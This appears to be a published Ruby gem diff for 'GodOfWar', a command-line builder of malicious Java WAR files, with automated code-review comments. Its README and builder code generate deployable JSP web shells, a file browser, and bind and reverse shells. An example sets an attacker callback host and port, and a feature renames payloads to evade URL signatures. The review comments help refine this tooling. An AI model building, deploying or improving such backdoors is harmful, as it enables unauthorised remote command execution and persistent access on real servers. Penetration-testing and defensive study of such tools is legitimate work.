godofwar 0.1.1

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: cad770ac51b330105ebdebed6020e46fe9389e1a5b7585921b7541c34178b0b0
4
+ data.tar.gz: 99bd5b547ce8c0f1cd9c3363aa503d3243f32e6d94ae15933163f35b07b71bee
5
+ SHA512:
6
+ metadata.gz: 9fac4faf7bf2cbd79f2498c858a288e8548aac1d01e14d5fee6b799c5930216baabe4e2d96ca6aaa1d58cc6a230d29635ae8964b399f4c3c8247f552f07df53c
7
+ data.tar.gz: 13dc0ed6aadb81cafe8c211e288f312339bc164a5ffafbf716a6d1a9da83ec57550f3c256153b1390a2a739684927a304c2c23ff6ad06590f40d5964c5244b6b
@@ -0,0 +1,74 @@
1
+ # Contributor Covenant Code of Conduct
2
+
3
+ ## Our Pledge
4
+
5
+ In the interest of fostering an open and welcoming environment, we as
6
+ contributors and maintainers pledge to making participation in our project and
7
+ our community a harassment-free experience for everyone, regardless of age, body
8
+ size, disability, ethnicity, gender identity and expression, level of experience,
9
+ nationality, personal appearance, race, religion, or sexual identity and
10
+ orientation.
11
+
12
+ ## Our Standards
13
+
14
+ Examples of behavior that contributes to creating a positive environment
15
+ include:
16
+
17
+ * Using welcoming and inclusive language
18
+ * Being respectful of differing viewpoints and experiences
19
+ * Gracefully accepting constructive criticism
20
+ * Focusing on what is best for the community
21
+ * Showing empathy towards other community members
22
+
23
+ Examples of unacceptable behavior by participants include:
24
+
25
+ * The use of sexualized language or imagery and unwelcome sexual attention or
26
+ advances
27
+ * Trolling, insulting/derogatory comments, and personal or political attacks
28
+ * Public or private harassment
29
+ * Publishing others' private information, such as a physical or electronic
30
+ address, without explicit permission
31
+ * Other conduct which could reasonably be considered inappropriate in a
32
+ professional setting
33
+
34
+ ## Our Responsibilities
35
+
36
+ Project maintainers are responsible for clarifying the standards of acceptable
37
+ behavior and are expected to take appropriate and fair corrective action in
38
+ response to any instances of unacceptable behavior.
39
+
40
+ Project maintainers have the right and responsibility to remove, edit, or
41
+ reject comments, commits, code, wiki edits, issues, and other contributions
42
+ that are not aligned to this Code of Conduct, or to ban temporarily or
43
+ permanently any contributor for other behaviors that they deem inappropriate,
44
+ threatening, offensive, or harmful.
45
+
46
+ ## Scope
47
+
48
+ This Code of Conduct applies both within project spaces and in public spaces
49
+ when an individual is representing the project or its community. Examples of
50
+ representing a project or community include using an official project e-mail
51
+ address, posting via an official social media account, or acting as an appointed
52
+ representative at an online or offline event. Representation of a project may be
53
+ further defined and clarified by project maintainers.
54
+
55
+ ## Enforcement
56
+
57
+ Instances of abusive, harassing, or otherwise unacceptable behavior may be
58
+ reported by contacting the project team at king.sabri@gmail.com. All
59
+ complaints will be reviewed and investigated and will result in a response that
60
+ is deemed necessary and appropriate to the circumstances. The project team is
61
+ obligated to maintain confidentiality with regard to the reporter of an incident.
62
+ Further details of specific enforcement policies may be posted separately.
63
+
64
+ Project maintainers who do not follow or enforce the Code of Conduct in good
65
+ faith may face temporary or permanent repercussions as determined by other
66
+ members of the project's leadership.
67
+
68
+ ## Attribution
69
+
70
+ This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71
+ available at [http://contributor-covenant.org/version/1/4][version]
72
+
73
+ [homepage]: http://contributor-covenant.org
74
+ [version]: http://contributor-covenant.org/version/1/4/
data/Gemfile ADDED
@@ -0,0 +1,4 @@
1
+ source "https://rubygems.org"
2
+
3
+ # Specify your gem's dependencies in godofwar.gemspec
4
+ gemspec
data/Gemfile.lock ADDED
@@ -0,0 +1,19 @@
1
+ PATH
2
+ remote: .
3
+ specs:
4
+ godofwar (0.1.1)
5
+ rubyzip
6
+
7
+ GEM
8
+ remote: https://rubygems.org/
9
+ specs:
10
+ rubyzip (1.2.2)
11
+
12
+ PLATFORMS
13
+ ruby
14
+
15
+ DEPENDENCIES
16
+ godofwar!
17
+
18
+ BUNDLED WITH
19
+ 2.0.1
data/README.md ADDED
@@ -0,0 +1,132 @@
1
+ # GodOfWar - Malicious Java WAR builder
2
+ A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.
3
+
4
+ ```
5
+ .
6
+ hhh
7
+ hhhhhhh
8
+ hhhhhhhh
9
+ hhhhhhhh+
10
+ hhhhhhhh'
11
+ hhhhhhhh.
12
+ hhhhhhhhh
13
+ ..-- hhhhhhhhh
14
+ -sh/.. +. hhhhhhhhh:
15
+ /+/:-/+ss-` hhhhhhhhhh:
16
+ /MMM`ss:``.` hhhhhhhhhh:
17
+ .MMMMM: hhhhhhhhhhhhhhhhh:
18
+ MMMMMMM: hhhhhhhhhhhhhhhh:
19
+ MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
20
+ :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
21
+ ./:`smdo+oos++- `++sNMMMMMNmh+
22
+ .-y-` ` :. / -dmddhhhhh-
23
+ o/- `//o/ /M/ `+hhhhhhhh`
24
+ /o :yosmy +y .`.hhhhhhhho
25
+ +` /../.: `.y::hhhhhs:`
26
+ ` `+yys` .sy` /oohhy:
27
+ `/:s/-`` `.hh`
28
+ ..` ` y+
29
+ .hNNmmNdymmmmds` :-
30
+ hs. ``.. :y- `
31
+ -hhmNmddm+ .
32
+ `NMMMMMMm
33
+ ` `oMMy
34
+ `. /Md- :o
35
+ MMMMMMMMMMMMMMMMMMM:
36
+ MMMMMMMMMMMMMMMMMM:
37
+ MMMMMMMMMMMMMMMMM
38
+ MMMMMMMMMMMMMMM.
39
+ `MMMMMMMMMMMMM.
40
+ :sNMMMNMdo:
41
+ ``+m:/-
42
+ `
43
+ GodOfWar - Malicious Java WAR builder.
44
+ ```
45
+
46
+ ## Features
47
+
48
+ - Preexisting payloads. (try `-l/--list`)
49
+ - cmd_get
50
+ - filebrowser
51
+ - bind_shell
52
+ - reverse_shell_ui
53
+ - Configurable backdoor. (try `--host/-port`)
54
+ - Control over payload name.
55
+ - To avoid malicious name after deployment to bypass URL name signatures.
56
+
57
+ ## Installation
58
+
59
+ ```
60
+ $ gem install godofwar
61
+ ```
62
+
63
+ ## Usage
64
+ ```
65
+ $ godofwar -h
66
+
67
+ Help menu:
68
+ -p, --payload PAYLOAD Generates war from one of the available payloads.
69
+ (check -l/--list)
70
+ -H, --host IP_ADDR Local or Remote IP address for the chosen payload
71
+ (used with -p/--payload)
72
+ -P, --port PORT Local or Remote Port for the chosen payload
73
+ (used with -p/--payload)
74
+ -o, --output [FILE] Output file and the deployment name.
75
+ (default is the payload original name. check '-l/--list')
76
+ -l, --list list all available payloads.
77
+ -h, --help Show this help message.
78
+ ```
79
+
80
+ ### Example
81
+
82
+ **List all payloads**
83
+ ```
84
+ $ godofwar -l
85
+ ├── cmd_get
86
+ │   └── Information:
87
+ │ ├── Description: Command execution via web interface
88
+ │ ├── OS: any
89
+ │ ├── Settings: {"false"=>"No Settings required!"}
90
+ │ ├── Usage: http://host/cmd.jsp?cmd=whoami
91
+ │ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
92
+ │ └── Local Path: /FULL/PATH/HERE/godofwar/payloads/cmd_get
93
+ ├── filebrowser
94
+ │   └── Information:
95
+ │ ├── Description: Remote file browser, upload, download, unzip files and native command execution
96
+ │ ├── OS: any
97
+ │ ├── Settings: {"false"=>"No Settings required!"}
98
+ │ ├── Usage: http://host/filebrowser.jsp
99
+ │ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
100
+ │ └── Local Path: /FULL/PATH/HERE/godofwar/payloads/filebrowser
101
+ ├── bind_shell
102
+ │   └── Information:
103
+ │ ├── Description: TCP bind shell
104
+ │ ├── OS: any
105
+ │ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
106
+ │ ├── Usage: http://host/reverse-shell.jsp
107
+ │ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
108
+ │ └── Local Path: /FULL/PATH/HERE/godofwar/payloads/bind_shell
109
+ ├── reverse_shell_ui
110
+ │   └── Information:
111
+ │ ├── Description: TCP reverse shell with a UI to set LHOST and LPORT from browser.
112
+ │ ├── OS: windows
113
+ │ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
114
+ │ ├── Usage: http://host/reverse_shell_ui.jsp
115
+ │ ├── References: []
116
+ │ └── Local Path: /FULL/PATH/HERE/godofwar/payloads/reverse_shell_ui
117
+ ```
118
+
119
+ **Generate payload with LHOST and LPORT**
120
+ ```
121
+ godofwar -p reverse_shell_ui -H 192.168.100.10 -P 9911 -o puppy
122
+ ```
123
+
124
+ ## Contributing
125
+
126
+ Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/godofwar.
127
+
128
+
129
+ ## License
130
+
131
+ The gem is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).
132
+
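Review bot: The Contributing section still carries the template placeholder `https://github.com/[USERNAME]/godofwar`; the gemspec homepage and the issue link in bin/godofwar both use https://github.com/KINGSABRI/godofwar, so the README should too. In Features, `--host/-port` should read `--host/--port` to match the help text. In the sample listing, the `bind_shell` entry shows `Usage: http://host/reverse-shell.jsp`, which does not follow the payload's own name the way the other three entries do, and the entries that have real settings still print `"false"=>"No Settings required!"` next to them, which reads as contradictory.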
data/Rakefile ADDED
@@ -0,0 +1,2 @@
1
+ require "bundler/gem_tasks"
2
+ task :default => :spec
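Review bot: `task :default => :spec` depends on a `spec` task that nothing in this package defines: `bundler/gem_tasks` does not provide one, and neither Gemfile.lock nor the gemspec lists rspec or rake. Running `rake` with no arguments will abort on the missing task; either add the RSpec rake task together with a development dependency, or drop the default.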
data/bin/godofwar ADDED
@@ -0,0 +1,77 @@
1
+ #!/usr/bin/env ruby
2
+ #
3
+ # GodOfWare - A command-line tool to generate war payloads for penetration testing / red teaming purposes.
4
+ # @Author: KING SABRI - @KINGSABRI
5
+ #
6
+ lib = File.expand_path("../../lib", __FILE__)
7
+ $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
8
+ require 'godofwar'
9
+
10
+ options = OpenStruct.new(payload: nil, host: nil, port: nil,
11
+ list: false, output: nil, version: false)
12
+
13
+ option_parser = OptionParser.new
14
+ option_parser.banner = "#{"GodOfWar".bold} - Malicious Java WAR builder."
15
+ option_parser.set_summary_indent ' '
16
+ option_parser.separator "\nHelp menu:".underline
17
+ option_parser.on('-p', '--payload PAYLOAD',
18
+ 'Generates war from one of the available payloads.',
19
+ "\t(check -l/--list)"
20
+ ) {|v| options.payload = v}
21
+
22
+ option_parser.on('-H', '--host IP_ADDR',
23
+ 'Local or Remote IP address for the chosen payload',
24
+ "\t(used with -p/--payload)"
25
+ ) {|v| options.host = v}
26
+ option_parser.on('-P', '--port PORT', Integer,
27
+ 'Local or Remote Port for the chosen payload',
28
+ "\t(used with -p/--payload)"
29
+ ) {|v| options.port = v}
30
+ option_parser.on('-o', "--output [FILE]",
31
+ 'Output file and the deployment name.',
32
+ "\t(default is the payload original name. check '-l/--list')") do |v|
33
+ options.output = v
34
+ end
35
+ option_parser.on('-l', '--list', 'list all available payloads.') { |v| options.list = v }
36
+ option_parser.on('-h', '--help', 'Show this help message') {puts GodOfWar::Utils.banner , option_parser; exit!}
37
+
38
+ begin
39
+ option_parser.parse!(ARGV)
40
+ payloads = GodOfWar::Payloads.new
41
+
42
+ case
43
+ when options.list
44
+ puts payloads.list_tree
45
+ when options.payload
46
+ payload = payloads.find_payload(options.payload)
47
+
48
+ if payload.nil?
49
+ puts "Unknown Payload: check available payloads using '-l/--list' option.".warn
50
+ exit!
51
+ end
52
+
53
+ GodOfWar::Builder.new(payload) do |build|
54
+ build.output = options.output
55
+ build.directory_structure
56
+ build.web_xml
57
+ build.manifest_mf
58
+ build.set_payload(options.host, options.port)
59
+ build.war
60
+ end
61
+
62
+ else
63
+ puts GodOfWar::Utils.banner
64
+ puts option_parser
65
+ end
66
+ rescue OptionParser::MissingArgument => e
67
+ e.args.each { |arg| puts "#{e.reason.capitalize} for '#{arg}' option.".error }
68
+ puts option_parser
69
+ rescue OptionParser::InvalidOption => e
70
+ puts "#{e}".error
71
+ puts option_parser
72
+ rescue Exception => e
73
+ puts "Unknown Exception".error
74
+ puts 'Please report the issue at: https://github.com/KINGSABRI/godofwar/issues'.warn
75
+ puts e.full_message
76
+ puts "#{e}".error
77
+ end
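Review bot: `rescue Exception => e` at the end of the begin block is too broad: it also traps Interrupt and other non-StandardError exceptions and reports them as "Unknown Exception". Rescue StandardError instead and add an `OptionParser::InvalidArgument` branch, since `-P` is declared with `Integer` and a non-numeric port currently falls into the catch-all with a full backtrace. `exit!` in the `-h` handler and in the unknown-payload branch skips at_exit handlers and defaults to a failure status, so asking for help reports an error to the calling shell; plain `exit` is enough there. The options struct defines `version: false` but no flag ever sets it, and the header comment spells the tool "GodOfWare".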
data/godofwar.gemspec ADDED
@@ -0,0 +1,26 @@
1
+
2
+ lib = File.expand_path("../lib", __FILE__)
3
+ $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
4
+ require "godofwar/version"
5
+
6
+ Gem::Specification.new do |spec|
7
+ spec.name = "godofwar"
8
+ spec.version = GodOfWar::VERSION
9
+ spec.authors = ["KINGSABRI"]
10
+ spec.email = ["king.sabri@gmail.com"]
11
+
12
+ spec.summary = %q{Evil war builder for hackers with built-in war payloads.}
13
+ spec.description = %q{Evil war builder for hackers with built-in war payloads.}
14
+ spec.homepage = "https://github.com/KINGSABRI/godofwar"
15
+ spec.license = "MIT"
16
+
17
+ spec.files = Dir.glob("**/*")
18
+ spec.bindir = "bin"
19
+ spec.executables = ["godofwar"]
20
+ spec.require_paths = ["lib"]
21
+
22
+ spec.add_dependency 'rubyzip'
23
+
24
+ spec.metadata["homepage_uri"] = spec.homepage
25
+ spec.metadata["source_code_uri"] = "https://github.com/KINGSABRI/godofwar"
26
+ end
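Review bot: `spec.files = Dir.glob("**/*")` packages whatever happens to be in the working tree at build time, which is how Gemfile.lock ended up inside this release and would equally pull in previously built .gem files or generated output; list the shipped paths explicitly (bin, lib, the payloads directory, README). `spec.add_dependency 'rubyzip'` carries no version constraint, so the `rubyzip (1.2.2)` pin in Gemfile.lock does nothing for people installing the gem; add a lower bound here. `summary` and `description` are the same string, and no development dependencies are declared even though the Rakefile expects a spec task.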
data/lib/godofwar.rb ADDED
@@ -0,0 +1,20 @@
1
+ # Standard libraries
2
+ require 'optparse'
3
+ require 'ostruct'
4
+ require 'json'
5
+ require 'fileutils'
6
+
7
+ # GodOfWar
8
+ require 'godofwar/version'
9
+ require 'godofwar/builder'
10
+ require 'godofwar/payloads'
11
+ require 'godofwar/extensions'
12
+ require 'godofwar/utils'
13
+
14
+ # Gems
15
+ require 'zip'
16
+
17
+ module GodOfWar
18
+ class Error < StandardError; end
19
+ String.class_eval { include Extensions::Core::String }
20
+ end
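Review bot: `String.class_eval { include Extensions::Core::String }` mixes the helper methods into every String in the process as soon as the library is required, so names such as `warn`, `error` and `bold` (all used in bin/godofwar) become global and can collide with other code loaded alongside it; a refinement or a small formatter module would keep them local to this gem. `require 'zip'` also sits after `require 'godofwar/builder'`, which uses `Zip::File`; it works because the constant is resolved at call time, but the third-party require belongs ahead of the code that depends on it.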
@@ -0,0 +1,137 @@
1
+ #
2
+ # KING SABRI | @KINGSABRI
3
+ #
4
+ module GodOfWar
5
+ #
6
+ # Builder module responsible for building base files around GodOfWar
7
+ # ├── cmd_get.jsp
8
+ # ├── META-INF
9
+ # │   └── MANIFEST.MF
10
+ # │ Manifest-Version: 1.0
11
+ # │ Created-By: 1.6.0_10 (Sun Microsystems Inc.)
12
+ # └── WEB-INF
13
+ # └── web.xml
14
+ #
15
+ class Builder
16
+ attr_accessor :output
17
+
18
+ def initialize(payload)
19
+ @output = nil
20
+ @payload = payload
21
+ yield self
22
+ end
23
+
24
+ def directory_structure
25
+ if @output
26
+ @war_dir = @output
27
+ else
28
+ @war_dir = @payload.name
29
+ @output = @payload.name
30
+ end
31
+
32
+ @output = @output? @output : @payload.name
33
+ rename_if_exists("#{@war_dir}.war")
34
+ puts "Creating Directory Structure:".tell
35
+ FileUtils.mkdir_p(File.join(@war_dir, 'WEB-INF'))
36
+ FileUtils.mkdir_p(File.join(@war_dir, 'META-INF'))
37
+ puts "#{@war_dir}".step_success
38
+ puts File.join(@war_dir, 'WEB-INF').step_success
39
+ puts File.join(@war_dir, 'META-INF').step_success
40
+ end
41
+
42
+ # WEB-INF
43
+ #
44
+ # web_xml builds 'web.xml' file for a given jsp file
45
+ #
46
+ # @return [String]
47
+ #
48
+ def web_xml
49
+ web_xml_path = File.join(@war_dir, 'WEB-INF', 'web.xml')
50
+ web_xml = <<~WEBXML
51
+ <?xml version="1.0" ?>
52
+ <web-app xmlns="http://java.sun.com/xml/ns/j2ee"
53
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
54
+ xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
55
+ http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
56
+ version="2.4">
57
+ <servlet>
58
+ <servlet-name>#{@output.capitalize}</servlet-name>
59
+ <jsp-file>/#{@output}.jsp</jsp-file>
60
+ </servlet>
61
+ </web-app>
62
+ WEBXML
63
+
64
+ File.write(web_xml_path, web_xml)
65
+ puts "#{web_xml_path}".step_success
66
+ end
67
+
68
+ # web_xml builds 'MANIFEST.MF' file for a given jsp file
69
+ #
70
+ # @return [String]
71
+ #
72
+ def manifest_mf
73
+ manifest_mf_path = File.join(@war_dir, 'META-INF', 'MANIFEST.MF')
74
+ manifest_mf =
75
+ <<~MANIFEST
76
+ Manifest-Version: 1.0
77
+ Created-By: 1.6.0_10 (Sun Microsystems Inc.)
78
+ MANIFEST
79
+
80
+ File.write(manifest_mf_path, manifest_mf)
81
+ puts "#{File.join(@war_dir, 'META-INF', 'MANIFEST.MF')}".step_success
82
+ end
83
+
84
+ def set_payload(host, port)
85
+ payload_file = File.join(@payload.path, "#{@payload.name}.jsp")
86
+
87
+ if @payload.conf.empty?
88
+ payload_raw = File.read(payload_file)
89
+ else
90
+ host = host.nil? ? @payload.conf["host"] : host
91
+ port = port.nil? ? @payload.conf["host"] : port
92
+ payload_raw = File.read(payload_file)
93
+ .sub('HOSTHOST', "#{host}").sub('PORTPORT', "#{port}")
94
+ end
95
+ File.write(File.join(@output, "#{@output}.jsp"), payload_raw)
96
+ puts "Setting up payload:".tell
97
+ puts "#{File.join(@war_dir, @payload.name)}.jsp".step_success
98
+ end
99
+
100
+ # build_war build the WAR file by recursively the source directory content then zip it
101
+ def war
102
+ final_war = "#{@output}.war"
103
+ Zip::File.open(final_war, Zip::File::CREATE) do |zip|
104
+ Dir.glob("#{@war_dir}/**/*" ).each do |file|
105
+ zip.add(file.sub(@output, '').sub(/[\/|\\]/, ''), file)
106
+ end
107
+ end
108
+ puts "Cleaning up".tell
109
+ FileUtils.rm_rf(@war_dir)
110
+ puts "Backdoor ".done + "#{@output}.war".bold + " has been created."
111
+ end
112
+
113
+ private
114
+
115
+ # check if the war file exists, rename it if true.
116
+ def rename_if_exists(file)
117
+ if File.exist? file
118
+ rename = "#{file}_#{Time.now.to_i}"
119
+ puts "File '#{file}' exists".warn
120
+ puts "Renamed '#{file}' to '#{rename}'".tell
121
+ FileUtils.mv(file, rename, force: true)
122
+ end
123
+ end
124
+
125
+ end
126
+ end
127
+
128
+ if __FILE__ == $0
129
+ payload = 'reverse_shell_ui'
130
+ GodOfWar::Builder.new(payload) do |build|
131
+ # p build.structure
132
+ # p build.web_xml
133
+ puts build.payload('1.1.1.1', 4444)
134
+ p build.default
135
+ # p build.war
136
+ end
137
+ end
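Review bot: `war` ends with `FileUtils.rm_rf(@war_dir)`, and `@war_dir` is the raw `-o` value, so pointing `-o` at a directory that already exists makes `directory_structure` reuse it through `mkdir_p` and then deletes it with everything in it; `rename_if_exists` only guards the `.war` file. Stage the build in a `Dir.mktmpdir` directory and reject output names that contain path separators, which also covers the unescaped `#{@output}` interpolated into web.xml. In `set_payload`, the port default reads `@payload.conf["host"]` where `"port"` is meant, and the success message prints `@payload.name` while the file is written as `#{@output}.jsp`. The `if __FILE__ == $0` block calls `build.payload` and `build.default`, neither of which exists on Builder, and passes a String where the methods expect a payload object; remove it. The comment above `manifest_mf` still says "web_xml builds", and the second `@output = @output? @output : @payload.name` in `directory_structure` is redundant after the preceding if/else.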